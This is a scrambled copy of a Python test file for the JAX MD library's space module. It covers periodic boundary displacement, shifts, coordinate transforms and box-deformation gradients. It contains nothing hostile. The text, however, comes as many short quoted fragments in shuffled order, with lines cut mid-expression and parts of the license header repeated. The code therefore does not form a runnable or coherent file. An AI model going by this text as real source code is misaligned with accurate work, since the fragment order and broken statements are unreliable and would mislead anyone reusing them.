f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format': box_format } for", "= 1e-13 if dtype is f32: tol = 2e-5 for", "R, box, (s, E), (s_gf, E_gf), (s_g, E_g) # pylint:", "grad(E_g)(R), new_box=deformed_box) R_gf_new = space.transform(deformed_box, s_gf(R_f, grad(E_gf)(R_f))) self.assertAllClose(R_new, R_gf_new) @parameterized.named_parameters(jtu.cases_from_list(", "OF ANY KIND, either express or implied. 
# See the", "SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "See the License for the specific language governing permissions and", "to in writing, software # distributed under the License is", "R_prime = space.transform(T, R) energy_direct = lambda R: jnp.sum(R **", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R unwrapped_R = R displacement,", "key, split_T1_scale, split_T1_dT = random.split(key, 3) key, split_t, split_R, split_dR", "== R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "deformed_box = box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f,", "or agreed to in writing, software # distributed under the", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension,", "E), (s_gf, E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype,", "box_energy_gf_fn(box): return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if __name__ == '__main__':", "T_inv = space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test)", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_force(self, spatial_dimension, dtype, box_format):", "obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0", "R = shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R,", "box_size, dtype) d, s = space.periodic(jnp.diag(box) if box_format == 'matrix'", "key, split = random.split(key) dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension),", "3] BOX_FORMATS = ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE =", "compliance with the License. 
# You may obtain a copy", "key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1, split2", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype,", "= \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) @grad def box_energy_g_fn(box): return", "key, split1, split2 = random.split(key, 3) R = random.uniform( split1,", "return R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g)", "dtype=dtype) T_inv = space.inverse(T) R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R,", "space.map_product(true_disp_fn) R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR =", "jnp.eye(spatial_dimension) for _ in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key,", "key, split_R, split_T = random.split(key, 3) dT = random.normal( split_T,", "R0)) assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R < 1))", "functools import partial from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl()", "= [f32, f64] else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N, dim,", "not use this file except in compliance with the License.", "dR = space.map_product(space.pairwise_displacement)(R, R) dR_wrapped = space.periodic_displacement(f32(1.0), dR) dR_direct =", "you may not use this file except in compliance with", "space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d)) E_gf = jit(energy.soft_sphere_pair(d_gf)) E_g =", "random.split(key, 3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) T", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype):", "= [f32] def make_periodic_general_test_system(N, dim, dtype, box_format): assert box_format in", "R_test = space.transform(T_inv, space.transform(T, R)) self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "split_dR, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose( disp_fn(R, R), jnp.array(true_disp_fn(R, R), dtype=dtype))", "(N, dim), dtype=dtype) R = space.transform(box, R_f) E = jit(energy.soft_sphere_pair(d))", "language governing permissions and # limitations under the License. 
\"\"\"Tests", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "= random.split(key, 4) size_0 = 10.0 * random.uniform(split_T0_scale, ()) dtransform_0", "jnp.array(true_shift_fn(R, dR), dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim,", "= jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted < dr_direct,", "grad(energy_indirect, 1)(T, R) self.assertAllClose(grad_direct, grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f,", "split2 = random.split(key, 3) R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension),", "spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension)) R_prime = space.transform(T, R)", "* random.uniform( split1, (spatial_dimension,), dtype=dtype) transform = jnp.diag(box_size) R =", "config as jax_config from jax import random import jax.numpy as", "disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim,", "#5849.') N = 16 R_f, R, box, (s, E), (s_gf,", "2019 Google LLC # # Licensed under the Apache License,", "box_format in BOX_FORMATS)) def test_periodic_general_energy(self, spatial_dimension, dtype, box_format): N =", "2): for k in range(-1, 2): dR_shifted = dR +", "== 3: for i in range(-1, 2): for j in", "split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R0 = R unwrapped_R = R", "spatial_dimension == 2: for i in range(-1, 2): for j", "dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where( dr_shifted <", "dr_direct) dR_direct = jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped,", "dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__),", "else box) d_gf, s_gf = space.periodic_general(box) d_g, s_g = space.periodic_general(box,", "= jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format == 'matrix': box", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE for box_format in", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension,", "for dim in SPATIAL_DIMENSION)) def test_transform_grad(self, spatial_dimension): key = random.PRNGKey(0)", "import partial from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging()", "E_gf), (s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R),", "fractional_coordinates=False) key = random.PRNGKey(0) R_f = random.uniform(key, (N, dim), dtype=dtype)", "jnp.all(R_shift < 1.0) assert jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0),", "box_format in BOX_FORMATS)) def test_periodic_general_deform_grad(self, spatial_dimension, dtype, box_format): N =", "'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for dim in SPATIAL_DIMENSION)) def", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension,", 
"jnp.array(jnp.ones(dim) * box_size, dtype) elif box_format == 'matrix': box =", "3: for i in range(-1, 2): for j in range(-1,", "dtype, box_format): N = 16 R_f, R, box, (s, E),", "random.split(key, 4) size_0 = 10.0 * random.uniform(split_T0_scale, ()) dtransform_0 =", "FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS", "R = random.uniform( split_R, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = random.normal(", "dtype, box_format): if box_format == 'scalar': raise SkipTest('Scalar case fails", "if dtype is f32: tol = 1e-5 for _ in", "dR_direct = jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct =", "= grad(lambda R: jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert", "at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "from absl.testing import parameterized from jax.config import config as jax_config", "dim, 'dtype': dtype } for dim in SPATIAL_DIMENSION for dtype", "from unittest import SkipTest test_util.update_test_tolerance(5e-5, 5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS =", "- R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( {", "max_box_size = f32(10.0) box_size = max_box_size * random.uniform( split1, (spatial_dimension,),", "random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1 = 0.5 * random.normal( split_T1_dT, (spatial_dimension,", "grad(E)(R)) R_gf_new = s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new,", "in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_grad_box(self, spatial_dimension, dtype,", "https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "space.periodic(jnp.diag(box) if box_format == 'matrix' else box) d_gf, s_gf =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def", "file except in compliance with the License. 
# You may", "== 2: for i in range(-1, 2): for j in", "space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) self.assertAllClose(disp_fn(R_scaled, R_scaled), general_disp_fn(R, R)) assert disp_fn(R_scaled,", "= random.split(key) dR = random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R", "tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES): key, split1, split2", "R_f, R, box, (s, E), (s_gf, E_gf), (s_g, E_g) =", "R_gf_new) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype, 'box_format':", "= dR + jnp.array([i, j, k], dtype=R.dtype) dr_shifted = space.distance(dR_shifted)", "assert general_grad_fn(R).dtype == dtype @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "'dtype': dtype, 'box_format': box_format } for dim in SPATIAL_DIMENSION for", "range(STOCHASTIC_SAMPLES): key, split1, split2, split3 = random.split(key, 4) max_box_size =", "for dtype in POSITION_DTYPE)) def test_transform_inverse(self, spatial_dimension, dtype): key =", "jnp.array(dR_direct, dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( {", "split2 = random.split(key, 3) R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T", "random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR > 0.49,", "for box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension, dtype, box_format): N", "< 1.0) assert jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift", "dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "= space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn =", "dR_shifted = dR + jnp.array([i, j, k], dtype=R.dtype) dr_shifted =", "SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key", "dtype) d, s = space.periodic(jnp.diag(box) if box_format == 'matrix' else", "in range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key, 3) key, split_T1_scale,", "grad(E_g)(R, new_box=deformed_box)) self.assertAllClose(jacfwd(E_gf)(R_f, box=deformed_box), jacfwd(E_g)(R, new_box=deformed_box)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}',", "dtransform_0), dtype=dtype) size_1 = 10.0 * random.uniform(split_T1_scale, (), dtype=dtype) dtransform_1", "0.49, f32(0.49), dR) dR = jnp.where(dR < -0.49, f32(-0.49), dR)", "= random.split(key, 3) key, split_t, split_R, split_dR = random.split(key, 4)", "KIND, either express or implied. 
# See the License for", "self.assertAllClose(R, R_test) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype':", "dR) dR_direct = dR dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct,", "dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct)", "= jnp.where( dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct = jnp.where(", "= random.split(key, 3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self,", "(the \"License\"); # you may not use this file except", "dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where( dr_shifted", "'spatial_dimension': dim, 'dtype': dtype, 'box_format': box_format } for dim in", "d_g, s_g = space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f =", "= 10 STOCHASTIC_SAMPLES = 10 SHIFT_STEPS = 10 SPATIAL_DIMENSION =", "shift(R, dR) unwrapped_R = unwrapped_shift(unwrapped_R, dR) self.assertAllClose( displacement(R, R0), displacement(unwrapped_R,", "tol = 1e-13 if dtype is f32: tol = 2e-5", "dR) assert R_shift.dtype == R.dtype assert jnp.all(R_shift < 1.0) assert", "is f32: tol = 2e-5 for _ in range(STOCHASTIC_SAMPLES): key,", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension, dtype):", "for dtype in POSITION_DTYPE)) def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key", "displacement, shift = space.periodic_general(T) _, unwrapped_shift = space.periodic_general(T, wrapped=False) displacement", "jnp.all(R_shift > 0.0) dR_after = space.periodic_displacement(f32(1.0), R_shift - R) assert", "# # Unless required by applicable law or agreed to", "= random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = space.map_product(space.pairwise_displacement)(R, R)", "space.periodic_general(transform) disp_fn = space.map_product(disp_fn) general_disp_fn = space.map_product(general_disp_fn) grad_fn = grad(lambda", "dr_direct.shape + (1,)) if spatial_dimension == 2: for i in", "spatial_dimension), dtype=dtype) T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) T_inv", "T = random.normal( split2, (spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki',", "def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f, R,", "dtype, box_format) deformed_box = box * 0.9 R_new = s_g(R,", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_canonicalize_displacement_or_metric(self,", "implied. 
# See the License for the specific language governing", "E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype':", "= jit(energy.soft_sphere_pair(d_gf)) E_g = jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s,", "R, dR) assert R_shift.dtype == R.dtype assert jnp.all(R_shift < 1.0)", "for box_format in BOX_FORMATS)) def test_periodic_general_deform(self, spatial_dimension, dtype, box_format): N", "BOX_FORMATS = ['scalar', 'vector', 'matrix'] if FLAGS.jax_enable_x64: POSITION_DTYPE = [f32,", "0.5 * random.normal( split_T1_dT, (spatial_dimension, spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1", "R_prime) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}'.format(dim), 'spatial_dimension': dim } for dim", "dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_transform(self, spatial_dimension,", "energy from jax_md.util import * from functools import partial from", "s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new,", "Copyright 2019 Google LLC # # Licensed under the Apache", "== dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension':", "'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, } for dim", "dtype): key = random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol =", "grad_indirect) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype", "range(STOCHASTIC_SAMPLES): key, split_T0_scale, split_T0_dT = random.split(key, 3) key, split_T1_scale, split_T1_dT", "box_size = quantity.box_size_at_number_density(N, 1.0, dim) box = dtype(box_size) if box_format", "= lambda R: jnp.sum(R ** 2) energy_indirect = lambda T,", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box =", "R) assert dR_after.dtype == R.dtype self.assertAllClose(dR_after, dR) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR = jnp.where(dR > 0.49, f32(0.49), dR)", "pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): # pylint: disable=g-complex-comprehension @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "def test_periodic_general_wrapped_vs_unwrapped( self, spatial_dimension, dtype): key = random.PRNGKey(0) eye =", "Unless required by applicable law or agreed to in writing,", "= space.periodic(jnp.diag(box) if box_format == 'matrix' else box) d_gf, s_gf", "range(-1, 2): for k in range(-1, 2): dR_shifted = dR", "the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "{ 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype, } for", "the specific language governing permissions and # limitations under the", "random.normal( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R = shift(R, dR) unwrapped_R", "jnp from jax import grad, jit, jacfwd from jax import", "_ in range(STOCHASTIC_SAMPLES): key, split1, split2 = random.split(key, 3) R", "in BOX_FORMATS)) def 
test_periodic_general_force(self, spatial_dimension, dtype, box_format): N = 16", "def test_transform_inverse(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13", "for dtype in POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key =", "import * from functools import partial from unittest import SkipTest", "dtype in POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_shift(self, spatial_dimension,", "} for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def", "space.periodic_general(box, fractional_coordinates=False) key = random.PRNGKey(0) R_f = random.uniform(key, (N, dim),", "space.canonicalize_displacement_or_metric(displacement) metric = space.map_product(metric) test_metric = space.map_product(test_metric) for _ in", "4) max_box_size = f32(10.0) box_size = max_box_size * random.uniform( split1,", "2: for i in range(-1, 2): for j in range(-1,", "dtype=dtype)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': '_dim={}_dtype={}'.format(dim, dtype.__name__), 'spatial_dimension': dim, 'dtype': dtype,", "= \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) R_new = s(R, grad(E)(R))", "* box_size, dtype) d, s = space.periodic(jnp.diag(box) if box_format ==", "= partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn) true_disp_fn = space.map_product(true_disp_fn) R", "random.split(key, 3) R = random.normal( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R,", "R = random.normal(split1, (PARTICLE_COUNT, spatial_dimension)) T = random.normal(split2, (spatial_dimension, spatial_dimension))", "POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype): key = random.PRNGKey(0) for _", "random.PRNGKey(0) eye = jnp.eye(spatial_dimension, dtype=dtype) tol = 1e-13 if dtype", "'_dim={}'.format(dim), 'spatial_dimension': dim } for dim in SPATIAL_DIMENSION)) def test_transform_grad(self,", "dtype=dR.dtype) assert dR_wrapped.dtype == dtype self.assertAllClose(dR_wrapped, dR_direct) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "3) R = random.uniform( split1, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) dR =", "_ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement) metric", "dtype in POSITION_DTYPE)) def test_periodic_against_periodic_general_grad(self, spatial_dimension, dtype): key = random.PRNGKey(0)", "for dim in SPATIAL_DIMENSION for dtype in POSITION_DTYPE for box_format", "return E_gf(R_f, box=box) self.assertAllClose(box_energy_g_fn(box), box_energy_gf_fn(box)) if __name__ == '__main__': absltest.main()", "in range(-1, 2): dR_shifted = dR + jnp.array([i, j], dtype=R.dtype)", "POSITION_DTYPE = [f32, f64] else: POSITION_DTYPE = [f32] def make_periodic_general_test_system(N,", "E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(grad(E)(R), grad(E_gf)(R_f)) self.assertAllClose(grad(E)(R),", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box * 0.9 self.assertAllClose(E_gf(R_f,", "import space, test_util, quantity, energy from jax_md.util import * from", "5e-13) jax_config.parse_flags_with_absl() jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES", "space.distance(dR_shifted) dr_shifted = jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) 
dR_direct = jnp.where(", "POSITION_DTYPE)) def test_periodic_general_dynamic(self, spatial_dimension, dtype): key = random.PRNGKey(0) eye =", "jnp.array(jnp.eye(dim) * box_size, dtype) d, s = space.periodic(jnp.diag(box) if box_format", "split_R, split_T = random.split(key, 3) dT = random.normal( split_T, (spatial_dimension,", "box_format): assert box_format in BOX_FORMATS box_size = quantity.box_size_at_number_density(N, 1.0, dim)", "= s_gf(R_f, grad(E_gf)(R_f)) R_g_new = s_g(R, grad(E_g)(R)) self.assertAllClose(R_new, space.transform(box, R_gf_new))", "from jax_md.util import * from functools import partial from unittest", "true_shift_fn = space.periodic_general(T_1) disp_fn = partial(disp_fn, box=T_1) disp_fn = space.map_product(disp_fn)", "R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R > 0) and jnp.all(unwrapped_R", "(s_g, E_g) = \\ make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f))", "= space.periodic_shift(f32(1.0), R, dR) assert R_shift.dtype == R.dtype assert jnp.all(R_shift", "= jnp.where(dr_shifted < dr_direct, dr_shifted, dr_direct) elif spatial_dimension == 3:", "dtype is f32: tol = 1e-5 for _ in range(STOCHASTIC_SAMPLES):", "self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name': f'_dim={dim}_dtype={dtype.__name__}_box_format={box_format}', 'spatial_dimension': dim, 'dtype': dtype,", "split = random.split(key) R = random.uniform( split, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "* (eye + dtransform_1), dtype=dtype) disp_fn, shift_fn = space.periodic_general(T_0) true_disp_fn,", "< -0.49, f32(-0.49), dR) R_shift = space.periodic_shift(f32(1.0), R, dR) assert", "for j in range(-1, 2): dR_shifted = dR + jnp.array([i,", "spatial_dimension), dtype=dtype) T_1 = jnp.array(size_1 * (eye + dtransform_1), dtype=dtype)", "box_format) deformed_box = box * 0.9 self.assertAllClose(grad(E_gf)(R_f, box=deformed_box), grad(E_g)(R, new_box=deformed_box))", "You may obtain a copy of the License at #", "jnp.sum(general_disp_fn(R, R) ** 2)) self.assertAllClose(grad_fn(R_scaled), general_grad_fn(R)) assert general_grad_fn(R).dtype == dtype", "== 'scalar': raise SkipTest('Scalar case fails due to JAX Issue", "POSITION_DTYPE for box_format in BOX_FORMATS)) def test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format):", "def box_energy_g_fn(box): return E_g(R, new_box=box) @grad def box_energy_gf_fn(box): return E_gf(R_f,", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) deformed_box = box * 0.9 R_new", "make_periodic_general_test_system(N, spatial_dimension, dtype, box_format) self.assertAllClose(E(R), E_gf(R_f)) self.assertAllClose(E(R), E_g(R)) @parameterized.named_parameters(jtu.cases_from_list( {", "(1,)) dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted, dR_direct) dr_direct =", "(spatial_dimension, spatial_dimension), dtype=dtype) R_prime_exact = jnp.array(jnp.einsum('ij,kj->ki', T, R), dtype=dtype) R_prime", "R) ** 2)) general_grad_fn = grad(lambda R: jnp.sum(general_disp_fn(R, R) **", "(1,)) if spatial_dimension == 2: for i in range(-1, 2):", "R_scaled = R * box_size dR = random.normal( split3, (PARTICLE_COUNT,", "split_T0_dT, (spatial_dimension, spatial_dimension)) T_0 = jnp.array(size_0 * (eye + dtransform_0),", "spatial_dimension), dtype=dtype) disp_fn, shift_fn = space.periodic(box_size) general_disp_fn, general_shift_fn = space.periodic_general(transform)", "= s_g(R, grad(E_g)(R)) 
self.assertAllClose(R_new, space.transform(box, R_gf_new)) self.assertAllClose(R_new, R_g_new) @parameterized.named_parameters(jtu.cases_from_list( {", "= dR dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape +", "test_periodic_general_deform_shift(self, spatial_dimension, dtype, box_format): N = 16 R_f, R, box,", "def test_periodic_against_periodic_general(self, spatial_dimension, dtype): key = random.PRNGKey(0) tol = 1e-13", "dtype): key = random.PRNGKey(0) for _ in range(STOCHASTIC_SAMPLES): key, split1,", "dtype=dtype) dR = jnp.sqrt(f32(0.1)) * random.normal( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype)", "from jax import test_util as jtu from jax_md import space,", "jax_config.enable_omnistaging() FLAGS = jax_config.FLAGS PARTICLE_COUNT = 10 STOCHASTIC_SAMPLES = 10", "jit(energy.soft_sphere_pair(d_g)) return R_f, R, box, (s, E), (s_gf, E_gf), (s_g,", "dr_direct = space.distance(dR) dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,)) if", "jnp.reshape(dr_shifted, dr_shifted.shape + (1,)) dR_direct = jnp.where(dr_shifted < dr_direct, dR_shifted,", "self.assertAllClose( displacement(R, R0), displacement(unwrapped_R, R0)) assert not (jnp.all(unwrapped_R > 0)", "= random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled = R *", "(PARTICLE_COUNT, spatial_dimension), dtype=dtype) self.assertAllClose(metric(R, R), test_metric(R, R)) @parameterized.named_parameters(jtu.cases_from_list( { 'testcase_name':", "dr_direct = jnp.reshape(dr_direct, dr_direct.shape + (1,)) if spatial_dimension == 2:", "dtype): key = random.PRNGKey(0) tol = 1e-13 if dtype is", "'spatial_dimension': dim, 'dtype': dtype, } for dim in SPATIAL_DIMENSION for", "(s_gf, E_gf), (s_g, E_g) # pylint: disable=invalid-name class SpaceTest(jtu.JaxTestCase): #", "displacement, _ = space.periodic_general(jnp.eye(spatial_dimension)) metric = space.metric(displacement) test_metric = space.canonicalize_displacement_or_metric(displacement)", "random.uniform( split2, (PARTICLE_COUNT, spatial_dimension), dtype=dtype) R_scaled = R * box_size", "in SPATIAL_DIMENSION for dtype in POSITION_DTYPE)) def test_periodic_shift(self, spatial_dimension, dtype):", "assert R_shift.dtype == R.dtype assert jnp.all(R_shift < 1.0) assert jnp.all(R_shift", "License. 
